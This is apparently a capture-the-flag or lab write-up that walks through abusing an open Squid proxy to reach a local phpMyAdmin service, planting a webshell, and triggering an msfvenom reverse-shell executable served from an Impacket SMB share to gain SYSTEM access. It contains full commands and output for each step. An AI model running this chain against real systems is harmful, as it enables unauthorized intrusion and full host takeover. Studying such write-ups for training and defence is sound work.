NEKO IN THE SHELL # _

Abusing HTTP proxies to connect to unsecured admin services

This is our first challenge. We’re presented with a target and run nmap against it.

kali@kali:~$ nmap target
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 13:43 MDT
Nmap scan report for target (target)
Host is up (0.064s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http

Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

From this, we see that port 3128 is open, and that it’s usually running Squid proxy.

Navigating to this port in a web browser confirms such.

We don’t find any blatant/easy-to-exploit vulnerabilities in version 4.14 of Squid, so we decide to use the proxy to scan for services running on 127.0.0.1 of the target instead.

Had some trouble getting nmap to proxy correctly because Squid always replies with an error page. Nmap decides all ports must be closed.

Had to scan for open HTTP services using curl.

kali@kali:~$ for port in {1..65535}; do echo $port; curl -i -s --fail-early --proxy http://target:3128 http://target:$port | head -n 1 | grep 200; done
1
2
3
...
8080
HTTP/1.1 200 OK
8081
...

Okay, great, we see port 8080 is responding to requests, so let’s take a look at that.

Cool, let’s try to login to PHPMyAdmin.

Nice, now let’s try to write a webshell.

Great, now navigating to the webshell, we can run whoami and see we have nt-authority/system.

Now, let’s get an actual shell. Generate a reverse shell payload with msfvenom, host it via Impacket-SMBServer, and start a listener.

kali@kali:~/work$ msfvenom -p windows/shell_reverse_tcp LHOST=me LPORT=4444 -f exe -o rshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rshell.exe
kali@kali:~/work$ impacket-smbserver -smb2support share .
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
kali@kali:~/work$ nc -lnvp 4444
listening on [any] 4444 ...

From here, we can call our reverse shell payload from the webshell.

kali@kali:~/work$ curl --proxy http://target:3128 http://target:8080/cmd.php?cmd=\\\\me\\share\\rshell.exe

And like that, we’re in.

kali@kali:~/work$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [me] from (UNKNOWN) [target] 50638
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\wamp\www>whoami
whoami
nt authority\system